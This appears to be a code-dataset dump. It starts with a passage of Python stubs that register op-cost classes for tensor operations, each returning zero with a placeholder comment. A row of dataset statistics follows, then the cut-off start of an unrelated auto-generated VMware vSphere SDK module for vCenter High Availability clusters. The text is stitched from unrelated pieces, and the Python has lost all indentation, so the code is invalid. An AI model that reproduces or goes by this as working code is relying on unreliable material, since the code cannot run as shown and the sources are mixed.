class ElementwiseMulGradOpCost(CompOpCost):
OP_TYPE = "elementwise_mul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseMulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseSubOpCost(CompOpCost):
OP_TYPE = "elementwise_sub"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseSubOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseSubGradOpCost(CompOpCost):
OP_TYPE = "elementwise_sub_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseSubGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class EmbeddingOpCost(CompOpCost):
OP_TYPE = "c_embedding"
def __init__(self, op=None, op_desc=None, cluster=None):
super(EmbeddingOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class EmbeddingGradOpCost(CompOpCost):
OP_TYPE = "c_embedding_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(EmbeddingGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantOpCost(CompOpCost):
OP_TYPE = "fill_constant"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantBatchSizeLikeOpCost(CompOpCost):
OP_TYPE = "fill_constant_batch_size_like"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantBatchSizeLikeOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantBatchSizeLikeGradOpCost(CompOpCost):
OP_TYPE = "fill_constant_batch_size_like_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantBatchSizeLikeGradOpCost,
self).__init__(op=op, op_desc=op_desc, cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GatherOpCost(CompOpCost):
OP_TYPE = "gather"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GatherOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GeluOpCost(CompOpCost):
OP_TYPE = "gelu"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GeluOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GeluGradOpCost(CompOpCost):
OP_TYPE = "gelu_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GeluGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GreaterEqualOpCost(CompOpCost):
OP_TYPE = "greater_equal"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GreaterEqualOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class IncrementOpCost(CompOpCost):
OP_TYPE = "increment"
def __init__(self, op=None, op_desc=None, cluster=None):
super(IncrementOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class IsEmptyOpCost(CompOpCost):
OP_TYPE = "is_empty"
def __init__(self, op=None, op_desc=None, cluster=None):
super(IsEmptyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LayerNormOpCost(CompOpCost):
OP_TYPE = "layer_norm"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LayerNormOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LayerNormGradOpCost(CompOpCost):
OP_TYPE = "layer_norm_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LayerNormGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LessThanOpCost(CompOpCost):
OP_TYPE = "less_than"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LessThanOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogicalNotOpCost(CompOpCost):
OP_TYPE = "logical_not"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogicalNotOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogicalAndOpCost(CompOpCost):
OP_TYPE = "logical_and"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogicalAndOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LodResetOpCost(CompOpCost):
OP_TYPE = "lod_reset"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LodResetOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogOpCost(CompOpCost):
OP_TYPE = "log"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LookupTableV2OpCost(CompOpCost):
OP_TYPE = "lookup_table_v2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LookupTableV2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LookupTableV2GradOpCost(CompOpCost):
OP_TYPE = "lookup_table_v2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LookupTableV2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulOpCost(CompOpCost):
OP_TYPE = "matmul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulGradOpCost(CompOpCost):
OP_TYPE = "matmul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulV2OpCost(CompOpCost):
OP_TYPE = "matmul_v2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulV2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulV2GradOpCost(CompOpCost):
OP_TYPE = "matmul_v2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulV2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MemcpyOpCost(CompOpCost):
OP_TYPE = "memcpy"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MemcpyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MulOpCost(CompOpCost):
OP_TYPE = "mul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MulOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MulGradOpCost(CompOpCost):
OP_TYPE = "mul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class OneHotOpCost(CompOpCost):
OP_TYPE = "one_hot"
def __init__(self, op=None, op_desc=None, cluster=None):
super(OneHotOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReadFromArrayOpCost(CompOpCost):
OP_TYPE = "read_from_array"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReadFromArrayOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceSumOpCost(CompOpCost):
OP_TYPE = "reduce_sum"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceSumOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceSumGradOpCost(CompOpCost):
OP_TYPE = "reduce_sum_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceSumGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Reshape2OpCost(CompOpCost):
OP_TYPE = "reshape2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Reshape2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Reshape2GradOpCost(CompOpCost):
OP_TYPE = "reshape2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Reshape2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceMeanOpCost(CompOpCost):
OP_TYPE = "reduce_mean"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceMeanOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceMeanGradOpCost(CompOpCost):
OP_TYPE = "reduce_mean_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceMeanGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SamplingIdOpCost(CompOpCost):
OP_TYPE = "sampling_id"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SamplingIdOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ScaleOpCost(CompOpCost):
OP_TYPE = "scale"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ScaleOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SliceOpCost(CompOpCost):
OP_TYPE = "slice"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SliceOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxOpCost(CompOpCost):
OP_TYPE = "softmax"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxGradOpCost(CompOpCost):
OP_TYPE = "softmax_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxWithCrossEntropyOpCost(CompOpCost):
OP_TYPE = "softmax_with_cross_entropy"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxWithCrossEntropyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxWithCrossEntropyGradOpCost(CompOpCost):
OP_TYPE = "softmax_with_cross_entropy_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxWithCrossEntropyGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SplitOpCost(CompOpCost):
OP_TYPE = "split"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SplitOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Squeeze2OpCost(CompOpCost):
OP_TYPE = "squeeze2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Squeeze2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SquareOpCost(CompOpCost):
OP_TYPE = "square"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SquareOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SquareGradOpCost(CompOpCost):
OP_TYPE = "square_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SquareGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SumOpCost(CompOpCost):
OP_TYPE = "sum"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SumOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class TopKOpCost(CompOpCost):
OP_TYPE = "top_k"
def __init__(self, op=None, op_desc=None, cluster=None):
super(TopKOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Transpose2OpCost(CompOpCost):
OP_TYPE = "transpose2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Transpose2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Transpose2GradOpCost(CompOpCost):
OP_TYPE = "transpose2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Transpose2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Unsqueeze2OpCost(CompOpCost):
OP_TYPE = "unsqueeze2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Unsqueeze2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class WriteToArrayOpCost(CompOpCost):
OP_TYPE = "write_to_array"
def __init__(self, op=None, op_desc=None, cluster=None):
super(WriteToArrayOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops function need to be overrided
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
| 33.54741 | 88 | 0.599805 | 5,362 | 42,102 | 4.473517 | 0.042521 | 0.049527 | 0.059616 | 0.092133 | 0.847876 | 0.824572 | 0.82232 | 0.819069 | 0.81565 | 0.81565 | 0 | 0.00603 | 0.33825 | 42,102 | 1,254 | 89 | 33.574163 | 0.854923 | 0.310674 | 0 | 0.72067 | 0 | 0 | 0.02735 | 0.004165 | 0 | 0 | 0 | 0 | 0 | 1 | 0.273743 | false | 0 | 0.001397 | 0.181564 | 0.641061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 10 |
657dd9a86e5a01eeba9e34575564c86fa0460962 | 52,785 | py | Python | com/vmware/vcenter/vcha/cluster_client.py | vishal-12/vsphere-automation-sdk-python | 9cf363971db77ea5a12928eecd5cf5170a7fcd8a | [
"MIT"
] | null | null | null | com/vmware/vcenter/vcha/cluster_client.py | vishal-12/vsphere-automation-sdk-python | 9cf363971db77ea5a12928eecd5cf5170a7fcd8a | [
"MIT"
] | null | null | null | com/vmware/vcenter/vcha/cluster_client.py | vishal-12/vsphere-automation-sdk-python | 9cf363971db77ea5a12928eecd5cf5170a7fcd8a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.vcha.cluster.
#---------------------------------------------------------------------------
"""
The ``com.vmware.vcenter.vcha.cluster_client`` module provides classes for
redeploying and monitoring a vCenter High Availability (VCHA) Cluster after a
successful initial deployment.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from com.vmware.cis_client import Tasks
from vmware.vapi.stdlib.client.task import Task
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Active(VapiInterface):
"""
The ``Active`` class provides methods to get information related to the
active vCenter High Availability (VCHA) node. This class was added in
vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.active'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ActiveStub)
class Info(VapiStruct):
"""
The ``Active.Info`` class contains the network and placement information of
the active node of a VCHA Cluster. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
management=None,
ha=None,
placement=None,
):
"""
:type management: :class:`com.vmware.vcenter.vcha_client.IpSpec`
:param management: IP specification for the Management network. This attribute was
added in vSphere API 6.7.1.
:type ha: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha: IP specification for the HA network. This attribute was added in
vSphere API 6.7.1.
If None, then the second NIC of the Active Node of the VCHA cluster
is not configured.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementInfo` or ``None``
:param placement: Contains the placement information of the active node. This
attribute was added in vSphere API 6.7.1.
If None, the request specified that placement information of the
active node should not be included.
"""
self.management = management
self.ha = ha
self.placement = placement
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.active.info', {
'management': type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec'),
'ha': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
'placement': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementInfo')),
},
Info,
False,
None))
def get(self,
vc_spec=None,
partial=None,
):
"""
Retrieves information about the active node of a VCHA cluster. This
method was added in vSphere API 6.7.1.
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains active node's management vCenter server credentials.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type partial: :class:`bool` or ``None``
:param partial: If true, then return only the information that does not require
connecting to the Active vCenter Server.
If false or unset, then return all the information.
If None, then return all the information.
:rtype: :class:`Active.Info`
:return: Info Information about the VCHA network and placement of the active
node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authentincating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
* If ``partial`` is false or unset, then the operation execution
requires the Global.VCServer privilege.
* If ``partial`` is true, then the operation execution requires the
System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If the management interface IP address assignment is not static.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get',
{
'vc_spec': vc_spec,
'partial': partial,
})
class DeploymentType(VapiInterface):
"""
The DeploymentType class provides methods to get the deployment type of a
vCenter High Availability Cluster (VCHA Cluster). This class was added in
vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.deployment_type'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _DeploymentTypeStub)
class Type(Enum):
"""
The ``DeploymentType.Type`` class defines the possible deployment types for
a VCHA Cluster. This enumeration was added in vSphere API 6.7.1.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
NONE = None
"""
VCHA Cluster is not configured. This class attribute was added in vSphere
API 6.7.1.
"""
AUTO = None
"""
